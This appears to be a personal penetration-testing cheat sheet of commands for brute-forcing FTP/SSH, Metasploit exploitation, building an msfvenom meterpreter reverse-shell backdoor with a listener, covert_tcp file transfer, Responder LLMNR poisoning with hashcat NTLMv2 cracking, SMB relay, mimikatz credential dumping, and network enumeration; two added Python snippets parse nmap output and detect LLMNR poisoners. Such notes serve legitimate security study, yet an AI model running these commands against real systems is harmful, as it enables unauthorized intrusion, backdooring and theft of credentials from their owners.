spicy_pentest_checklist

xam2

20 November 2022 19:48

Hydra tool:

hydra -L <users.txt> -P <passwords.txt> ftp://<ip>

Medusa:

medusa -h <ip> -U <users.txt> -P <passwords.txt> -M <service (ftp, ssh)>

Vulnerability Assessments

nikto -h <ip> -Tuning x

System hacking with Metasploit

  • Do nmap service detection

  • search <service name> (e.g. for Samba: search usermap_script)

  • use <module name>

  • show options

  • set RHOST <target ip> and set LHOST <listener ip>

  • set PAYLOAD <payload path>

  • exploit

  • Note: payload: cmd/unix/reverse

  • For UnrealIRCd on port 6667 use: search unrealirc

Backdooring through Metasploit

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=<ip> LPORT=<port> -o <path>.exe

Listening:

msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <ip>

set LPORT <port>

exploit

Adding PowerSploit for VNC connection and evasion bypass!

Hacking a Windows machine with a Microsoft Office document using TheFatRat:

Gaining the highest (root) privilege using BeRoot

Once you have a reverse shell with meterpreter, upload BeRoot, then execute it from a shell.

Covert channels using covert_tcp

We have to compile the covert_tcp source first:

cc -o <output binary> <covert_tcp source file.c>

Receiver side (-server):

./covert_tcp -dest <ip> -source <ip> -source_port <port> -dest_port <port> -server -file <path where the received file is saved>

Sender side:

./covert_tcp -dest <ip> -source <ip> -source_port <port> -dest_port <port> -file <path of the file to send>

Steganography:

snow -C -m "<message>" -p "<password>" <existing.txt> <new.txt>

snow -C -p "<password>" <new.txt>

Host discovery

Linux tools:

Netdiscover

$netdiscover -i <interface name>

$netdiscover -r <subnet>

NMAP

$nmap -sn -PR [IP]

-sn: disable port scan; -PR: ARP ping scan

$nmap -sn -PU [IP]

-PU: UDP ping scan

$nmap -sn -PE [IP or IP range]

-PE: ICMP echo ping scan

$nmap -sn -PP [IP]

-PP: ICMP timestamp ping scan

$nmap -sn -PM [IP]

-PM: ICMP address mask ping scan

$nmap -sn -PS [IP]

-PS: TCP SYN ping scan

Scanning:

NMAP

$nmap -sn <ip> -vv -oA <output basename>

-oA writes <output basename>.nmap, .gnmap and .xml.

Ref: https://www.stationx.net/nmap-cheat-sheet/

To convert the nmap XML output to HTML use:

$xsltproc ms2.xml -o ms2.html

Port 21 (FTP) enumeration:

First of all we need to know the service type and version, e.g. vsftpd 2.3.4.

Second, FTP has a common issue: anonymous login (username: anonymous, password: anonymous).

Third, we can do a script scan: choose the relevant nmap script for the enumeration.

Now if the version does not show any details from basic enumeration, visit exploit-db.com and search for the exploit there.

If you want a local search, then try with

Always skip the DoS scripts.

If you don't have local access to the machine, always choose the remote scripts for the maximum results, if they are visible.

DoS: ignore.

Webapps: check further.

Remote: for direct usage.

Local: if you have certain access to the target, choose the local exploits.
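Since the scan above is written out with -oA and the port 21 checks start from the service version and the anonymous-login test, here is an added Python example (not from the original notes or from nmap itself) that pulls those facts out of nmap's XML output for a report; SAMPLE_XML is a constructed sample, not a real scan.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap -sV -oA output (not a real scan), cut down to the elements used here
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sV --script ftp-anon -oA ms2 192.168.72.139-140">
  <host><status state="up"/><address addr="192.168.72.139" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/>
        <script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)"/></port>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X"/></port>
      <port protocol="tcp" portid="6667"><state state="filtered"/><service name="irc"/></port>
    </ports></host>
  <host><status state="down"/><address addr="192.168.72.140" addrtype="ipv4"/></host>
</nmaprun>"""

def parse_nmap_xml(xml_text):
    """Map each live host's IPv4 address to its open ports with service, banner and script output."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        if host.find("status").get("state") != "up":
            continue                                    # skip hosts nmap could not reach
        ip = host.find("address[@addrtype='ipv4']").get("addr")
        entries = []
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue                                # filtered/closed ports carry no service facts
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            banner = " ".join(filter(None, [svc.get("product"), svc.get("version")])) if svc is not None else ""
            scripts = {s.get("id"): s.get("output", "") for s in port.findall("script")}
            entries.append({"port": int(port.get("portid")), "service": name, "banner": banner, "scripts": scripts})
        hosts[ip] = entries
    return hosts

def anonymous_ftp_hosts(hosts):
    """Hosts where nmap's ftp-anon script confirmed anonymous login (the port 21 check above)."""
    return sorted(ip for ip, ports in hosts.items()
                  for p in ports if "login allowed" in p["scripts"].get("ftp-anon", ""))

def summary_lines(hosts):
    """One line per open port in the form ip:port service banner [scripts], ready for a report."""
    return [f"{ip}:{p['port']} {p['service']} {p['banner']} {sorted(p['scripts'])}".rstrip()
            for ip, ports in hosts.items() for p in ports]
```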

Port 22 (SSH) enumeration:

  1. Guessing the username and password.

  2. Brute-forcing the username and password (get the username somehow).

  3. OpenSSL < 1.0: there is a private key brute-force attack option (legacy attack).

Port 23 (Telnet) enumeration:

  1. If any version is disclosed here, follow the same steps as the FTP exploit search.

SMB enumeration:

SMB versions: v1, v2, v3

Ports: 137, 138, 139, 445

  1. Anonymous login or guest login.

  2. If you have a password, mount the share.

  3. Version-specific issues:

SMBv1: EternalBlue; SMBv2: LLMNR poisoning; SMBv3: SMBGhost

Tools/keywords: distcc, kernelmapper, portmapper, enum4linux, smbclient, smbmap

--script discovery

SambaCry

SMB enum using nmap scripts

$nmap -p 445 --script /usr/share/nmap/scripts/smb-enum-sessions.nse <IP>

$nmap -p 445 --script /usr/share/nmap/scripts/smb-enum-shares.nse <IP>

$nmap -p 445 --script /usr/share/nmap/scripts/smb-os-discovery.nse <IP>

$nmap -Pn -n -p139,445 --script discovery 192.168.72.139

You can also specify -p 139,445 for the ports.

$nmap -p 139 --script smb-double-pulsar-backdoor <IP>

SMB enum using smbclient and smbmap

$smbclient -L //192.168.72.139

$smbmap -H 192.168.72.139

$smbclient //192.168.72.139/tmp

SMB enum using smbmap

$smbmap -R tmp -H <ip>

You can also use -U, -P, -R and -r; please check the manual page.

SMB enum using smbclient:

$smbclient -L <ip with the path>

Enum4linux: mostly used for Samba enum!

*enumerate info from Windows and Samba hosts using enum4linux

enum4linux -u martin -p apple -n $ip

-n: do an nmblookup (similar to nbtstat)

//information: target info, workgroup/domain, domain SID (security identifier), list of users with RID (relative identifier)

enum4linux -u martin -p apple -P $ip

//password policy info

enum4linux -u martin -p apple -S $ip

//share policy info

A good resource covering everything discussed so far: https://github.com/irgoncalves/smbclient_cheatsheet

Windows tools:

NetScanTools Pro --> use the SMB scanner option

NetBIOS enumeration:

Tool: https://nbtenum.sourceforge.net/

nbtstat -a <ip> (Windows only)

nbtstat -c (Windows only)

nbtscan <ip-range> (Parrot/Linux only)

Microsoft documentation: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat

You can also use nmap here:

nmap -sV -v --script nbtstat.nse <ip>

nmap -sU -p 137 --script nbtstat.nse <ip>

-sV: probe open ports to determine service/version info

*NetBIOS enum using cmd:

nbtstat -a $ip

-a: NetBIOS name table of the remote computer

nbtstat -c

-c: NetBIOS name cache of the remote computer

net use

connection status, shared folders, network info; connects or disconnects a computer from a shared resource

*NetBIOS enum using NetBIOS Enumerator

NetBIOS enumeration: SuperScan

NetBIOS Enumerator: null session NetBIOS

net use \\<IP>\<FOLDER> "" /user:""

SNMP enumeration:

snmp-check <ip>

nmap -sU -p 161 <ip>

**perform SNMP enum using snmp-check; first check if SNMP is open:

nmap -sU -p 161 $ip

shows whether 161 is open (using the default "public" community string)

snmp-check $ip

//get system info and user accounts, network info, network interfaces, routing info and listening ports

//processes, storage, file system, device info, shares

**perform SNMP enum using SoftPerfect Network Scanner: specify the range, discover devices, right-click > properties and get the details

SNMP 161 brute force

nmap -sU -p 161 --script=snmp-brute <IP>

Metasploit: auxiliary/scanner/snmp/snmp_login, auxiliary/scanner/snmp/snmp_enum

**Lab2-Task1: Enumerate SNMP using snmp-check**

  • nmap -sU -p 161 [IP]

  • **snmp-check [IP]**

**Addition**

  • nbtstat -a [IP] (Windows)

  • nbtstat -c

DNS enumeration:

To get name server and mail server details:

$dnsenum <domain>

To get the different services running on the target domain:

$dnsrecon -t srv -d <domain>

$dnsrecon -t axfr -d <domain> (this is for zone transfer)

To get the name servers of the target domain:

$fierce -dns <domain>

*perform DNS enum

//collect DNS server names, hostnames, machine names, usernames, IP addresses and aliases in the target domain

**perform DNS enum using zone transfer; open a terminal in Linux

dig ns www.certifiedhacker.com

retrieves info about the DNS name server of the target domain and displays it in the answer section

try if zone transfer is possible:

dig @ns1.bluehost.com www.certifiedhacker.com axfr

axfr retrieves the zone information

**perform DNS enum of Windows DNS servers; open cmd in Windows

>nslookup

>set querytype=soa

soa: start of authority record, administrative info about the DNS zone

>certifiedhacker.com

>ls -d ns1.bluehost.com

ls -d requests a zone transfer; ns1.bluehost.com is the primary name server

**perform DNS enum using DNSSEC zone walking

//DNS records (MX, SOA, NS, A, AAAA, SPF, TXT) enumerator

dnsrecon -d www.certifiedhacker.com -z

-d: domain

-z: zone walk using the standard enum procedure

LDAP enum:

perform LDAP enumeration

..generate a list of distributed directory services on the target system

..directory services hold a hierarchical, logical tree of network components, from a list of printers to corporate email directories

..company org chart

**perform LDAP enumeration using Active Directory Explorer by Sysinternals: connect using the IP and creds

the complete AD is displayed and it is possible to modify it as well

Windows tool: Active Directory Explorer.

RPC enum:

*perform RPC, SMB and FTP enumeration

RPC -> check for vulnerable services on these ports

SMB -> enable banner grabbing, OS details, service version

FTP -> check FTP services and attacks: FTP bounce, FTP brute force and packet sniffing

*perform RPC & SMB enumeration using NetScanTools Pro

RPC - NetScanTools Pro

>Manual tools

>*nix RPC info

>target IP, target port 111

>dump portmap

>result: retrieval of all running registered daemons on the target system

SMB - NetScanTools Pro

>SMB scanner

>add to list -> ok

>login cred, username, password > add to list > ok

>click "get SMB versions"

>result: NetBIOS name, DNS name, SMB versions, shares

*perform RPC & SMB & FTP enumeration using nmap

nmap -p 21 $ip

nmap -A $ip

nmap -A -p 445 $ip

NFS enum:

*perform NFS enumeration

NFS: access / view / store / update files on a remote server

After LDAP go for NFS: identify exported directories, the list of clients connected to the server with their IP addresses and the shared data associated with them

Possible to spoof the IP and get access to the shared resource

**perform NFS enumeration with superenum; check if NFS is open:

nmap -p 2049 $ip

NFS also runs on other ports

echo $ip > target.txt

./superenum

//pass the filename -> target.txt; takes 15-20 minutes to complete

**perform NFS enumeration with rpc-scan

git clone https://github.com/hegusung/RPCScan

python3 rpc-scan.py $ip --rpc

it will show the list if NFS is open

System hacking:

Gem references: https://github.com/SpiderLabs/Responder

https://medium.com/mii-cybersec/gaining-credentials-easily-with-responder-tool-b821f33e342b

Responder

responder -I tun0

john <responder hash file>

  1. Download the Responder tool

--> git clone https://github.com/lgandx/Responder

  2. Launch Responder

--> python Responder.py -I eth0

--> Check that LLMNR / NBT-NS / DNS / MDNS are ON

  3. Search for a shared file on the victim host

--> \\hackme

  4. Attacker host (Responder)

--> Received the NTLMv2 hash of the victim

  5. Crack the hash value to get the password using hashcat

--> hashcat -m 5600 hashes.txt rockyou.txt -D1

--> hashcat -m 5600 hashes.txt rockyou.txt -D1 --show --user

  6. SMB relay

--> python MultiRelay.py -h

--> python MultiRelay.py -t <Target-IP> -u ALL

--> Before running the MultiRelay script, you need to turn OFF the SMB and HTTP options

--> vim Responder.conf

--> Received the hash value of the victim

--> Forward to the targeted file, to get access as the victim

  7. Show passwords on the victim host

--> help

--> mimi coffee

--> mimi sekurlsa::logonpasswords

  8. RunFinger

--> Only works when SMB is disabled.

--> python RunFinger.py -h

--> python RunFinger.py -i 192.168.1.0/24

Reference

--> https://notsosecure.com/pwning-with-responder-a-pentesters-guide/

--> https://www.youtube.com/watch?v=rjRDsXp_MNk&ab_channel=RajganeshPandurangan

--> https://www.youtube.com/watch?v=LHv1ud5lnX0&ab_channel=Joostvan%27tZand
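A defender's counterpart to the LLMNR poisoning that the Responder steps above rely on: an added Python example (standard library only, not from Responder or the referenced guides) that sends one LLMNR query for a random name nobody owns and treats any answer as a poisoner. It assumes the probing host sits on the same broadcast segment and that no legitimate host has a name starting with "nx".

```python
import random, socket, struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # RFC 4795 multicast group and port

def build_llmnr_query(name, txid):
    # Header: id, flags=0, QDCOUNT=1; then the question: wire-format name, QTYPE=A, QCLASS=IN
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def skip_name(data, off):
    # Advance past a wire-format name; a byte >= 0xC0 starts a 2-byte compression pointer
    while 0 < data[off] < 0xC0:
        off += data[off] + 1
    return off + (2 if data[off] else 1)

def parse_llmnr_answers(data, txid):
    """IPv4 addresses in a response that matches txid; [] for anything else."""
    if len(data) < 12:
        return []
    rid, flags, qd, an = struct.unpack("!HHHH", data[:8])
    if rid != txid or not flags & 0x8000 or an == 0:    # 0x8000 = QR bit (response)
        return []
    off = 12
    for _ in range(qd):
        off = skip_name(data, off) + 4                  # skip QTYPE and QCLASS
    answers = []
    for _ in range(an):
        off = skip_name(data, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            answers.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return answers

def probe_for_poisoner(timeout=2.0):
    """Query a random name nobody owns; whoever answers is a poisoner (None if nobody does)."""
    name = "nx" + "".join(random.choices("abcdefghijklmnopqrstuvwxyz", k=12))
    txid = random.randrange(1, 0xFFFF)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:                                 # ignore unrelated datagrams
                data, (src, _) = sock.recvfrom(512)
                ips = parse_llmnr_answers(data, txid)
                if ips:
                    return src, ips
        except socket.timeout:
            return None                                 # healthy segment
```

Run probe_for_poisoner() periodically from a host on each segment and alert on any non-None result; turning LLMNR and NBT-NS off by policy removes the attack surface entirely.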
